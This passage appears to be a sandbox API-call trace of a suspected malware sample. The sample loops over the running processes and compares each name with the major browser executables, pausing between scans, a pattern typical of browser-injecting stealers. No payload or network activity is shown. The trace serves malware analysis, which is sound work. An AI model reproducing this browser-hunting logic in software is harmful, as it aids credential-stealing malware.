lpString2="iexplore.exe") returned 1 [0227.282] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0227.282] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.282] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0227.283] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0227.283] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0227.283] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0227.283] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0227.283] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0227.284] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0227.284] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0227.284] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0227.284] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.284] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0227.284] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0227.284] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0227.284] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0227.284] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.284] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.298] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0227.298] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0227.298] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0227.298] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.298] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0227.299] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0227.299] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0227.299] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0227.299] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.299] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.300] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0227.300] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0227.300] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0227.300] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.300] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0227.300] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0227.300] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0227.334] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0227.334] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.334] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0227.335] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0227.335] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0227.335] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0227.335] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0227.335] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0227.336] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0227.336] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0227.336] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0227.336] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.336] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0227.336] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0227.336] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0227.337] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0227.337] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.337] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0227.337] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0227.337] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0227.337] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0227.337] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0227.337] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0227.338] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0227.338] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0227.338] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0227.338] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0227.338] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0227.339] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0227.339] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0227.339] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0227.339] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0227.339] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0227.339] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0227.340] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0227.340] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0227.340] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0227.340] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0227.340] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0227.340] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0227.340] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0227.340] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0227.340] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0227.341] CloseHandle (hObject=0xd4) returned 1 [0227.341] Sleep (dwMilliseconds=0x3e8) [0228.355] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0228.356] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0228.357] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0228.357] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0228.357] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0228.357] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0228.357] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0228.357] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0228.357] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0228.357] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0228.357] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0228.357] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0228.358] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0228.358] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0228.358] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0228.358] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.358] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0228.359] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0228.359] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0228.359] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0228.359] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0228.359] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0228.359] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0228.359] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0228.359] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0228.359] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.359] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0228.360] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0228.360] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0228.360] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0228.360] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0228.360] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0228.360] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0228.360] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0228.360] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0228.360] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.360] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0228.361] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0228.361] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0228.361] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0228.361] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.361] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0228.362] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0228.362] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0228.362] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0228.362] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0228.362] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0228.362] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0228.362] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0228.362] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0228.362] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0228.362] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.363] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0228.363] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0228.363] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0228.363] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.363] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.363] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0228.363] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0228.363] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0228.363] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.363] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.364] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0228.364] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0228.364] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0228.364] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.364] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.364] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0228.364] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0228.364] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0228.365] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.365] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.365] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0228.365] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0228.365] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0228.365] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.365] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0228.367] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0228.367] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0228.367] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0228.367] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0228.367] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.367] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0228.367] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0228.367] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0228.367] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.367] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.368] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0228.368] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0228.368] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0228.368] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.368] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0228.368] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0228.368] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0228.368] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0228.368] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0228.368] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0228.369] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0228.369] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0228.369] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0228.369] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.369] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0228.370] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0228.370] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0228.370] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0228.370] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.370] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.370] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0228.370] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0228.370] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0228.370] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.370] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0228.371] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0228.371] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0228.371] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0228.371] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.371] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0228.371] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0228.371] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0228.371] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0228.371] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0228.371] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0228.372] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0228.372] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0228.372] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 